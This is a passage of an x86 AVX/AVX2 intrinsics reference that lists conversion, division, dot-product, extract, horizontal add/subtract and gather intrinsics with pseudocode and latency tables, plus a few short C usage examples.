Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvtpd2ps
__m128 _mm256_cvtpd_ps (__m256d a)

Synopsis

__m128 _mm256_cvtpd_ps (__m256d a)
#include «immintrin.h»
Instruction: vcvtpd2ps xmm, ymm
CPUID Flags: AVX

Description

Convert packed double-precision (64-bit) floating-point elements in a to packed single-precision (32-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 3 i := 32*j k := 64*j dst[i+31:i] := Convert_FP64_To_FP32(a[k+63:k]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvtps2dq
__m256i _mm256_cvtps_epi32 (__m256 a)

Synopsis

__m256i _mm256_cvtps_epi32 (__m256 a)
#include «immintrin.h»
Instruction: vcvtps2dq ymm, ymm
CPUID Flags: AVX

Description

Convert packed single-precision (32-bit) floating-point elements in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := Convert_FP32_To_Int32(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcvtps2pd
__m256d _mm256_cvtps_pd (__m128 a)

Synopsis

__m256d _mm256_cvtps_pd (__m128 a)
#include «immintrin.h»
Instruction: vcvtps2pd ymm, xmm
CPUID Flags: AVX

Description

Convert packed single-precision (32-bit) floating-point elements in a to packed double-precision (64-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j k := 32*j dst[i+63:i] := Convert_FP32_To_FP64(a[k+31:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 1
Ivy Bridge 2 1
Sandy Bridge 2 1
vcvttpd2dq
__m128i _mm256_cvttpd_epi32 (__m256d a)

Synopsis

__m128i _mm256_cvttpd_epi32 (__m256d a)
#include «immintrin.h»
Instruction: vcvttpd2dq xmm, ymm
CPUID Flags: AVX

Description

Convert packed double-precision (64-bit) floating-point elements in a to packed 32-bit integers with truncation, and store the results in dst.

Operation

FOR j := 0 to 3 i := 32*j k := 64*j dst[i+31:i] := Convert_FP64_To_Int32_Truncate(a[k+63:k]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvttps2dq
__m256i _mm256_cvttps_epi32 (__m256 a)

Synopsis

__m256i _mm256_cvttps_epi32 (__m256 a)
#include «immintrin.h»
Instruction: vcvttps2dq ymm, ymm
CPUID Flags: AVX

Description

Convert packed single-precision (32-bit) floating-point elements in a to packed 32-bit integers with truncation, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := Convert_FP32_To_Int32_Truncate(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
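
The difference between vcvtps2dq and vcvttps2dq is only the rounding: the former uses the current rounding mode (round-to-nearest-even by default), the latter always truncates toward zero. A sketch making that visible:

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256 x = _mm256_setr_ps(1.4f, 1.5f, 1.6f, -1.5f, 2.5f, -2.5f, 0.9f, -0.9f);

    __m256i rounded   = _mm256_cvtps_epi32(x);    /* vcvtps2dq: current rounding mode */
    __m256i truncated = _mm256_cvttps_epi32(x);   /* vcvttps2dq: always toward zero   */

    int r[8], t[8];
    _mm256_storeu_si256((__m256i *)r, rounded);
    _mm256_storeu_si256((__m256i *)t, truncated);
    for (int i = 0; i < 8; i++)
        printf("(%d,%d) ", r[i], t[i]);
    printf("\n");   /* (1,1) (2,1) (2,1) (-2,-1) (2,2) (-2,-2) (1,0) (-1,0) */
    return 0;
}
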
vdivpd
__m256d _mm256_div_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_div_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vdivpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Divide packed double-precision (64-bit) floating-point elements in a by packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j dst[i+63:i] := a[i+63:i] / b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 35 25
Ivy Bridge 35 28
Sandy Bridge 43 44
vdivps
__m256 _mm256_div_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_div_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vdivps ymm, ymm, ymm
CPUID Flags: AVX

Description

Divide packed single-precision (32-bit) floating-point elements in a by packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := a[i+31:i] / b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 21 13
Ivy Bridge 21 14
Sandy Bridge 29 28
vdpps
__m256 _mm256_dp_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_dp_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vdpps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Conditionally multiply the packed single-precision (32-bit) floating-point elements in a and b using the high 4 bits in imm8, sum the four products, and conditionally store the sum in dst using the low 4 bits of imm8.

Operation

DP(a[127:0], b[127:0], imm8[7:0]) { FOR j := 0 to 3 i := j*32 IF imm8[(4+j)%8] temp[i+31:i] := a[i+31:i] * b[i+31:i] ELSE temp[i+31:i] := 0 FI ENDFOR sum[31:0] := (temp[127:96] + temp[95:64]) + (temp[63:32] + temp[31:0]) FOR j := 0 to 3 i := j*32 IF imm8[j%8] tmpdst[i+31:i] := sum[31:0] ELSE tmpdst[i+31:i] := 0 FI ENDFOR RETURN tmpdst[127:0] } dst[127:0] := DP(a[127:0], b[127:0], imm8[7:0]) dst[255:128] := DP(a[255:128], b[255:128], imm8[7:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 14 2
Ivy Bridge 12 2
Sandy Bridge 12 2
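
Note that vdpps works per 128-bit lane, so an 8-element dot product still needs the two lane sums to be combined. A sketch using the extract/cast intrinsics from this listing (the SSE helpers _mm_add_ss and _mm_cvtss_f32 are assumptions outside this excerpt):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256 a = _mm256_setr_ps(1, 2, 3, 4, 5, 6, 7, 8);
    __m256 b = _mm256_set1_ps(1.0f);

    /* imm8 = 0xF1: multiply all four elements of each lane and write the
       lane sum into element 0 of that lane. */
    __m256 dp = _mm256_dp_ps(a, b, 0xF1);

    __m128 lo  = _mm256_castps256_ps128(dp);      /* sum of lanes 0..3 = 10 */
    __m128 hi  = _mm256_extractf128_ps(dp, 1);    /* sum of lanes 4..7 = 26 */
    float  dot = _mm_cvtss_f32(_mm_add_ss(lo, hi));

    printf("dot = %.1f\n", dot);                  /* 36.0 */
    return 0;
}
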
__int16 _mm256_extract_epi16 (__m256i a, const int index)

Synopsis

__int16 _mm256_extract_epi16 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract a 16-bit integer from a, selected with index, and store the result in dst.

Operation

dst[15:0] := (a[255:0] >> (index * 16))[15:0]
__int32 _mm256_extract_epi32 (__m256i a, const int index)

Synopsis

__int32 _mm256_extract_epi32 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract a 32-bit integer from a, selected with index, and store the result in dst.

Operation

dst[31:0] := (a[255:0] >> (index * 32))[31:0]
__int64 _mm256_extract_epi64 (__m256i a, const int index)

Synopsis

__int64 _mm256_extract_epi64 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract a 64-bit integer from a, selected with index, and store the result in dst.

Operation

dst[63:0] := (a[255:0] >> (index * 64))[63:0]
__int8 _mm256_extract_epi8 (__m256i a, const int index)

Synopsis

__int8 _mm256_extract_epi8 (__m256i a, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Extract an 8-bit integer from a, selected with index, and store the result in dst.

Operation

dst[7:0] := (a[255:0] >> (index * 8))[7:0]
vextractf128
__m128d _mm256_extractf128_pd (__m256d a, const int imm8)

Synopsis

__m128d _mm256_extractf128_pd (__m256d a, const int imm8)
#include «immintrin.h»
Instruction: vextractf128 xmm, ymm, imm
CPUID Flags: AVX

Description

Extract 128 bits (composed of 2 packed double-precision (64-bit) floating-point elements) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vextractf128
__m128 _mm256_extractf128_ps (__m256 a, const int imm8)

Synopsis

__m128 _mm256_extractf128_ps (__m256 a, const int imm8)
#include «immintrin.h»
Instruction: vextractf128 xmm, ymm, imm
CPUID Flags: AVX

Description

Extract 128 bits (composed of 4 packed single-precision (32-bit) floating-point elements) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vextractf128
__m128i _mm256_extractf128_si256 (__m256i a, const int imm8)

Synopsis

__m128i _mm256_extractf128_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vextractf128 xmm, ymm, imm
CPUID Flags: AVX

Description

Extract 128 bits (composed of integer data) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vextracti128
__m128i _mm256_extracti128_si256 (__m256i a, const int imm8)

Synopsis

__m128i _mm256_extracti128_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vextracti128 xmm, ymm, imm
CPUID Flags: AVX2

Description

Extract 128 bits (composed of integer data) from a, selected with imm8, and store the result in dst.

Operation

CASE imm8[7:0] of 0: dst[127:0] := a[127:0] 1: dst[127:0] := a[255:128] ESAC dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
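
A minimal sketch pulling the upper 128-bit half out of a 256-bit integer vector (_mm256_setr_epi32 and _mm_storeu_si128 are standard intrinsics not listed here):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256i v  = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
    __m128i hi = _mm256_extracti128_si256(v, 1);   /* vextracti128: elements 4..7 */

    int out[4];
    _mm_storeu_si128((__m128i *)out, hi);
    printf("%d %d %d %d\n", out[0], out[1], out[2], out[3]);   /* 4 5 6 7 */
    return 0;
}
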
vroundpd
__m256d _mm256_floor_pd (__m256d a)

Synopsis

__m256d _mm256_floor_pd (__m256d a)
#include «immintrin.h»
Instruction: vroundpd ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed double-precision (64-bit) floating-point elements in a down to an integer value, and store the results as packed double-precision floating-point elements in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := FLOOR(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vroundps
__m256 _mm256_floor_ps (__m256 a)

Synopsis

__m256 _mm256_floor_ps (__m256 a)
#include «immintrin.h»
Instruction: vroundps ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed single-precision (32-bit) floating-point elements in a down to an integer value, and store the results as packed single-precision floating-point elements in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := FLOOR(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vphaddw
__m256i _mm256_hadd_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hadd_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphaddw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally add adjacent pairs of 16-bit integers in a and b, and pack the signed 16-bit results in dst.

Operation

dst[15:0] := a[31:16] + a[15:0] dst[31:16] := a[63:48] + a[47:32] dst[47:32] := a[95:80] + a[79:64] dst[63:48] := a[127:112] + a[111:96] dst[79:64] := b[31:16] + b[15:0] dst[95:80] := b[63:48] + b[47:32] dst[111:96] := b[95:80] + b[79:64] dst[127:112] := b[127:112] + b[111:96] dst[143:128] := a[159:144] + a[143:128] dst[159:144] := a[191:176] + a[175:160] dst[175:160] := a[223:208] + a[207:192] dst[191:176] := a[255:240] + a[239:224] dst[207:192] := b[127:112] + b[143:128] dst[223:208] := b[159:144] + b[175:160] dst[239:224] := b[191:176] + b[207:192] dst[255:240] := b[223:208] + b[239:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 2
vphaddd
__m256i _mm256_hadd_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hadd_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphaddd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally add adjacent pairs of 32-bit integers in a and b, and pack the signed 32-bit results in dst.

Operation

dst[31:0] := a[63:32] + a[31:0] dst[63:32] := a[127:96] + a[95:64] dst[95:64] := b[63:32] + b[31:0] dst[127:96] := b[127:96] + b[95:64] dst[159:128] := a[191:160] + a[159:128] dst[191:160] := a[255:224] + a[223:192] dst[223:192] := b[191:160] + b[159:128] dst[255:224] := b[255:224] + b[223:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 2
vhaddpd
__m256d _mm256_hadd_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_hadd_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vhaddpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally add adjacent pairs of double-precision (64-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[63:0] := a[127:64] + a[63:0] dst[127:64] := b[127:64] + b[63:0] dst[191:128] := a[255:192] + a[191:128] dst[255:192] := b[255:192] + b[191:128] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vhaddps
__m256 _mm256_hadd_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_hadd_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vhaddps ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally add adjacent pairs of single-precision (32-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[31:0] := a[63:32] + a[31:0] dst[63:32] := a[127:96] + a[95:64] dst[95:64] := b[63:32] + b[31:0] dst[127:96] := b[127:96] + b[95:64] dst[159:128] := a[191:160] + a[159:128] dst[191:160] := a[255:224] + a[223:192] dst[223:192] := b[191:160] + b[159:128] dst[255:224] := b[255:224] + b[223:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
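
vhaddps adds adjacent pairs within each 128-bit lane, so a full horizontal sum of eight floats takes two hadd steps plus a final cross-lane add. A sketch using the extract/cast intrinsics from this listing (the SSE helpers _mm_add_ss and _mm_cvtss_f32 are assumptions outside this excerpt):

#include <immintrin.h>
#include <stdio.h>

/* Horizontal sum of all 8 lanes; the two 128-bit lanes are combined at the end. */
static float hsum256(__m256 v)
{
    __m256 s1 = _mm256_hadd_ps(v, v);     /* pairwise sums              */
    __m256 s2 = _mm256_hadd_ps(s1, s1);   /* lane total in every element */
    __m128 lo = _mm256_castps256_ps128(s2);
    __m128 hi = _mm256_extractf128_ps(s2, 1);
    return _mm_cvtss_f32(_mm_add_ss(lo, hi));
}

int main(void)
{
    __m256 v = _mm256_setr_ps(1, 2, 3, 4, 5, 6, 7, 8);
    printf("sum = %.1f\n", hsum256(v));   /* 36.0 */
    return 0;
}
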
vphaddsw
__m256i _mm256_hadds_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hadds_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphaddsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally add adjacent pairs of 16-bit integers in a and b using saturation, and pack the signed 16-bit results in dst.

Operation

dst[15:0] := Saturate_To_Int16(a[31:16] + a[15:0]) dst[31:16] := Saturate_To_Int16(a[63:48] + a[47:32]) dst[47:32] := Saturate_To_Int16(a[95:80] + a[79:64]) dst[63:48] := Saturate_To_Int16(a[127:112] + a[111:96]) dst[79:64] := Saturate_To_Int16(b[31:16] + b[15:0]) dst[95:80] := Saturate_To_Int16(b[63:48] + b[47:32]) dst[111:96] := Saturate_To_Int16(b[95:80] + b[79:64]) dst[127:112] := Saturate_To_Int16(b[127:112] + b[111:96]) dst[143:128] := Saturate_To_Int16(a[159:144] + a[143:128]) dst[159:144] := Saturate_To_Int16(a[191:176] + a[175:160]) dst[175:160] := Saturate_To_Int16(a[223:208] + a[207:192]) dst[191:176] := Saturate_To_Int16(a[255:240] + a[239:224]) dst[207:192] := Saturate_To_Int16(b[127:112] + b[143:128]) dst[223:208] := Saturate_To_Int16(b[159:144] + b[175:160]) dst[239:224] := Saturate_To_Int16(b[191:176] + b[207:192]) dst[255:240] := Saturate_To_Int16(b[255:240] + b[239:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 2
vphsubw
__m256i _mm256_hsub_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hsub_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphsubw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally subtract adjacent pairs of 16-bit integers in a and b, and pack the signed 16-bit results in dst.

Operation

dst[15:0] := a[15:0] - a[31:16] dst[31:16] := a[47:32] - a[63:48] dst[47:32] := a[79:64] - a[95:80] dst[63:48] := a[111:96] - a[127:112] dst[79:64] := b[15:0] - b[31:16] dst[95:80] := b[47:32] - b[63:48] dst[111:96] := b[79:64] - b[95:80] dst[127:112] := b[111:96] - b[127:112] dst[143:128] := a[143:128] - a[159:144] dst[159:144] := a[175:160] - a[191:176] dst[175:160] := a[207:192] - a[223:208] dst[191:176] := a[239:224] - a[255:240] dst[207:192] := b[143:128] - b[159:144] dst[223:208] := b[175:160] - b[191:176] dst[239:224] := b[207:192] - b[223:208] dst[255:240] := b[239:224] - b[255:240] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vphsubd
__m256i _mm256_hsub_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hsub_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphsubd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally subtract adjacent pairs of 32-bit integers in a and b, and pack the signed 32-bit results in dst.

Operation

dst[31:0] := a[31:0] - a[63:32] dst[63:32] := a[95:64] - a[127:96] dst[95:64] := b[31:0] - b[63:32] dst[127:96] := b[95:64] - b[127:96] dst[159:128] := a[159:128] - a[191:160] dst[191:160] := a[223:192] - a[255:224] dst[223:192] := b[159:128] - b[191:160] dst[255:224] := b[223:192] - b[255:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vhsubpd
__m256d _mm256_hsub_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_hsub_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vhsubpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally subtract adjacent pairs of double-precision (64-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[63:0] := a[63:0] - a[127:64] dst[127:64] := b[63:0] - b[127:64] dst[191:128] := a[191:128] - a[255:192] dst[255:192] := b[191:128] - b[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vhsubps
__m256 _mm256_hsub_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_hsub_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vhsubps ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally subtract adjacent pairs of single-precision (32-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[31:0] := a[31:0] - a[63:32] dst[63:32] := a[95:64] - a[127:96] dst[95:64] := b[31:0] - b[63:32] dst[127:96] := b[95:64] - b[127:96] dst[159:128] := a[159:128] - a[191:160] dst[191:160] := a[223:192] - a[255:224] dst[223:192] := b[159:128] - b[191:160] dst[255:224] := b[223:192] - b[255:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vphsubsw
__m256i _mm256_hsubs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hsubs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphsubsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally subtract adjacent pairs of 16-bit integers in a and b using saturation, and pack the signed 16-bit results in dst.

Operation

dst[15:0] := Saturate_To_Int16(a[15:0] - a[31:16]) dst[31:16] := Saturate_To_Int16(a[47:32] - a[63:48]) dst[47:32] := Saturate_To_Int16(a[79:64] - a[95:80]) dst[63:48] := Saturate_To_Int16(a[111:96] - a[127:112]) dst[79:64] := Saturate_To_Int16(b[15:0] - b[31:16]) dst[95:80] := Saturate_To_Int16(b[47:32] - b[63:48]) dst[111:96] := Saturate_To_Int16(b[79:64] - b[95:80]) dst[127:112] := Saturate_To_Int16(b[111:96] - b[127:112]) dst[143:128] := Saturate_To_Int16(a[143:128] - a[159:144]) dst[159:144] := Saturate_To_Int16(a[175:160] - a[191:176]) dst[175:160] := Saturate_To_Int16(a[207:192] - a[223:208]) dst[191:176] := Saturate_To_Int16(a[239:224] - a[255:240]) dst[207:192] := Saturate_To_Int16(b[143:128] - b[159:144]) dst[223:208] := Saturate_To_Int16(b[175:160] - b[191:176]) dst[239:224] := Saturate_To_Int16(b[207:192] - b[223:208]) dst[255:240] := Saturate_To_Int16(b[239:224] - b[255:240]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpgatherdd
__m128i _mm_i32gather_epi32 (int const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i32gather_epi32 (int const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
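
A minimal sketch of a gathered table lookup with _mm_i32gather_epi32 (the table and indices are illustrative; assumes AVX2). scale is 4 because each table element is 4 bytes wide.

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    int table[8] = { 10, 11, 12, 13, 14, 15, 16, 17 };
    __m128i idx  = _mm_setr_epi32(6, 0, 3, 5);          /* four 32-bit indices */
    __m128i got  = _mm_i32gather_epi32(table, idx, 4);  /* scale = sizeof(int) */

    int out[4];
    _mm_storeu_si128((__m128i *)out, got);
    printf("%d %d %d %d\n", out[0], out[1], out[2], out[3]);  /* 16 10 13 15 */
    return 0;
}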
vpgatherdd
__m128i _mm_mask_i32gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128i mask, const int scale)

Synopsis

__m128i _mm_mask_i32gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
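
The masked form can skip lanes entirely: lanes whose mask element has the high bit clear keep the value from src and generate no memory access. A small sketch (illustrative data, assumes AVX2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    int table[4] = { 100, 200, 300, 400 };
    __m128i idx  = _mm_setr_epi32(0, 1, 2, 3);
    __m128i src  = _mm_set1_epi32(-1);             /* fallback for masked-off lanes */
    __m128i mask = _mm_setr_epi32(-1, 0, -1, 0);   /* gather lanes 0 and 2 only     */
    __m128i got  = _mm_mask_i32gather_epi32(src, table, idx, mask, 4);

    int out[4];
    _mm_storeu_si128((__m128i *)out, got);
    printf("%d %d %d %d\n", out[0], out[1], out[2], out[3]);  /* 100 -1 300 -1 */
    return 0;
}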
vpgatherdd
__m256i _mm256_i32gather_epi32 (int const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256i _mm256_i32gather_epi32 (int const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdd
__m256i _mm256_mask_i32gather_epi32 (__m256i src, int const* base_addr, __m256i vindex, __m256i mask, const int scale)

Synopsis

__m256i _mm256_mask_i32gather_epi32 (__m256i src, int const* base_addr, __m256i vindex, __m256i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m128i _mm_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m128i _mm_mask_i32gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128i mask, const int scale)

Synopsis

__m128i _mm_mask_i32gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m256i _mm256_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)

Synopsis

__m256i _mm256_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m256i _mm256_mask_i32gather_epi64 (__m256i src, __int64 const* base_addr, __m128i vindex, __m256i mask, const int scale)

Synopsis

__m256i _mm256_mask_i32gather_epi64 (__m256i src, __int64 const* base_addr, __m128i vindex, __m256i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq ymm, vm32x, ymm
CPUID Flags: AVX2

Description

